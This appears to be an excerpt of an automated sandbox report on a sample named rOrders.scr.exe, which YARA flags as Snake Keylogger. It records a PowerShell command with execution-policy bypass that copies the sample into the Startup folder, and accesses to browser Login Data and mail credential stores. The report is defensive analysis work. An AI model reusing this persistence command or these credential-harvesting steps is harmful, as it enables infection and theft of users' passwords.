Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598641	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598422	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598192	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597512	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597391	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597281	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597172	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596953	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596391	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596063	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595719	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595594	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595375	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595266	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595047	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 594937	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 594718	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 594609	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 594500	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior

Source: rOrders.scr.exe, 00000004.00000002.4532169656.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
Source: svchost.exe, 00000005.00000002.3708848404.000002A0CA82B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: 00.exe, 00000009.00000002.4533112330.0000000001116000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlleQU
Source: svchost.exe, 00000005.00000002.3709311375.000002A0CFE54000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Code function: 9_2_069F7D90 LdrInitializeThunk,

9_2_069F7D90

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\rOrders.scr.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: C:\Users\user\Desktop\rOrders.scr.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\rOrders.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe'

Source: C:\Users\user\Desktop\rOrders.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\rOrders.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe'	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process created: C:\Users\user\Desktop\rOrders.scr.exe "C:\Users\user\Desktop\rOrders.scr.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe"	Jump to behavior

Source: C:\Users\user\Desktop\rOrders.scr.exe	Queries volume information: C:\Users\user\Desktop\rOrders.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Queries volume information: C:\Users\user\Desktop\rOrders.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\rOrders.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 6.2.00.exe.4379840.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rOrders.scr.exe.3c78e10.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rOrders.scr.exe.3c99840.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.4557201022.0000000004391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4538005534.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4557355431.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4557355431.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4557355431.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4536657049.0000000002F4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4531261400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4536657049.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4538005534.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rOrders.scr.exe PID: 1848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rOrders.scr.exe PID: 4760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 00.exe PID: 6444, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 00.exe PID: 7192, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\rOrders.scr.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Source: Yara match	File source: 0.2.rOrders.scr.exe.3c78e10.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rOrders.scr.exe.3c99840.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.4557355431.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4557355431.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4557355431.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4531261400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rOrders.scr.exe PID: 1848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rOrders.scr.exe PID: 4760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 00.exe PID: 7192, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 6.2.00.exe.4379840.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rOrders.scr.exe.3c78e10.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rOrders.scr.exe.3c99840.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.4557201022.0000000004391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4538005534.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4557355431.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4557355431.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4557355431.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4536657049.0000000002F4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4531261400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4536657049.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4538005534.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
